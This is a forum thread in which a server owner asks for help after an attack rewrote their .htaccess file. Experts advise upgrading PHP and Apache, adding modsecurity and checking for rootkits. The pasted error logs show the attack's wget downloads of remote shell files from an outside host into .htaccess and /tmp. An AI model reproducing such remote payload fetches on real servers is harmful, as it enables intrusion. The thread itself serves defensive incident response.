Solved

Server hacked, .htaccess file was changed

Posted on 2008-06-24
15
744 Views
Last Modified: 2013-11-15
Hi experts,

I have a dedicated server with godaddy. It was attacked 3 times this morning. The .htaccess file on the server was modified and redirected to other ip: 64.28.191.117. It seems they are able to write anything to my server.
The following is the error log I got. It seems to be very helpful, but I still cannot figure out what's the hole and what I should do. Thanks a lot!

[-] prtctl: Invalid argument
[-] prtctl: Invalid argument
--06:09:21--  http://www.dr-schwab.de/shell2.txt
           => `/home/myweb/public_html/.htaccess'
Resolving www.dr-schwab.de... 82.165.104.215
Connecting to www.dr-schwab.de|82.165.104.215|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 210 [text/plain]
 
    0K                                                       100%   33.38 MB/s
 
06:09:21 (33.38 MB/s) - `/home/myweb/public_html/.htaccess' saved [210/210]

Open in new window

0
Comment
Question by:z_ruixiang
[X]
Welcome to Experts Exchange

Add your voice to the tech community where 5M+ people just like you are talking about what matters.

  • Help others & share knowledge
  • Earn cash & points
  • Learn & ask questions
  • 7
  • 6
  • 2
15 Comments
 
LVL 10

Expert Comment

by:Casey Herman
ID: 21856284
If this is some sort of NIX you can change your permission on the file to read only.

Casey
0
 
LVL 29

Expert Comment

by:Jan Springer
ID: 21856374
That doesn't help if there is an application that is vulnerable.

Are you using PHP?  What version?  What version of Apache?

Has GoDaddy been notified?
0
 
LVL 10

Expert Comment

by:Casey Herman
ID: 21856459
That is right because you can write code to change the file modes....

Casey
0
Technology Partners: We Want Your Opinion!

We value your feedback.

Take our survey and automatically be enter to win anyone of the following:
Yeti Cooler, Amazon eGift Card, and Movie eGift Card!

 

Author Comment

by:z_ruixiang
ID: 21856566
I have changed all the files to read only, but it didn't help.
Apache/2.0.52  running on CentOS 4.
PHP Version 4.3.9
0
 
LVL 29

Expert Comment

by:Jan Springer
ID: 21856630
Upgrade Apache and PHP.  Run modsecurity.  Don't walk to the task, run -- before it is too late.
0
 

Author Comment

by:z_ruixiang
ID: 21856736
Will this upgrading really help? Do I need to change my code if upgraded to PHP5?
0
 
LVL 29

Expert Comment

by:Jan Springer
ID: 21856899
If you are running a release of PHP or whatever that has a security vulnerability, then, YES, you need to upgrade.  If you don't want to go to PHP5, then upgrade to the latest PHP4.  And upgrade Apache while you're at it.  Install modsecurity v2.  Review your apache config file and don't load modules such as proxying, etc if you don't need or use them.
0
 

Author Comment

by:z_ruixiang
ID: 21857153
Based on the log info, can we tell whether it's because of the Apache or PHP version? I mean, I really want to know what and where the hole is, how they could write on my server.
0
 
LVL 29

Accepted Solution

by:
Jan Springer earned 500 total points
ID: 21857372
I'd put my 2 cents on php.  Some interesting reading:

http://isisblogs.poly.edu/2008/02/23/reverse-engineering-a-php-virus/

If it were my machine, I'd scratch it and start over.  But do check that a root kit hasn't been installed -> www.chkrootkit.org.  Look in /tmp for applications and/or data that do not belong.
0
 

Author Comment

by:z_ruixiang
ID: 21857700
I think you are right. I found this in error log:

--06:03:54--  http://www.dr-schwab.de/shell3.c
           => `/tmp/sys.c'
Resolving www.dr-schwab.de... 82.165.104.215
Connecting to www.dr-schwab.de|82.165.104.215|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3,226 (3.2K) [text/x-csrc]

    0K ...                                                   100%   21.04 KB/s

06:03:55 (21.04 KB/s) - `/tmp/sys.c' saved [3226/3226]

And there is an unkown file in my /tmp

Is it a security vulnerability of the PHP I have? I will upgrade it.
0
 

Author Comment

by:z_ruixiang
ID: 21857755
Could you give me some instruction on how to upgrade to php5?
0
 
LVL 29

Expert Comment

by:Jan Springer
ID: 21857886
The problem with this is that applications could have been re-compiled by the hacker and you most likely have no idea which apps these are.

Move your webserver temporarily somewhere else and re-install is my suggestion.
0
 

Author Comment

by:z_ruixiang
ID: 21857961
I ran "yum update php", but it seems 4.3.9 is the latest version I can get.
0
 

Author Comment

by:z_ruixiang
ID: 21877321
What should I do to prevent it from being attacked if I get a new server? I'm not sure whether they still do that if I move to a totally new server.
0
 
LVL 29

Expert Comment

by:Jan Springer
ID: 21877468
1) install all of the latest versions of kernel and apps
2) keep a spreadsheet of current OS and application versions installed
3) subscribe to bugtraq at www.securityfocus.com
4) run modsecurity v2 with Apache 2.2.x
5) use iptables
6) periodically update and run chkrootkit -> www.chkrootkit.org
7) turn globals off in php
8) sanitize input variables to scripts and cgis
0

Featured Post

Migrating Your Company's PCs

To keep pace with competitors, businesses must keep employees productive, and that means providing them with the latest technology. This document provides the tips and tricks you need to help you migrate an outdated PC fleet to new desktops, laptops, and tablets.

Question has a verified solution.

If you are experiencing a similar issue, please ask a related question

All of the resources available today make learning a new digital media easier than ever-- if you know where to begin. This is a clear, simple guide to a few of the basic digital art mediums and how to begin learning them on your own.
This article investigates the question of whether a computer can really be cleaned once it has been infected, and what the best ways of cleaning a computer might be (in this author's opinion).
The viewer will learn how to create multiple layers to apply various filters and how to delete areas from each layer’s filter.
An overview on how to enroll an hourly employee into the employee database and how to give them access into the clock in terminal.

691 members asked questions and received personalized solutions in the past 7 days.

Join the community of 500,000 technology professionals and ask your questions.

Join & Ask a Question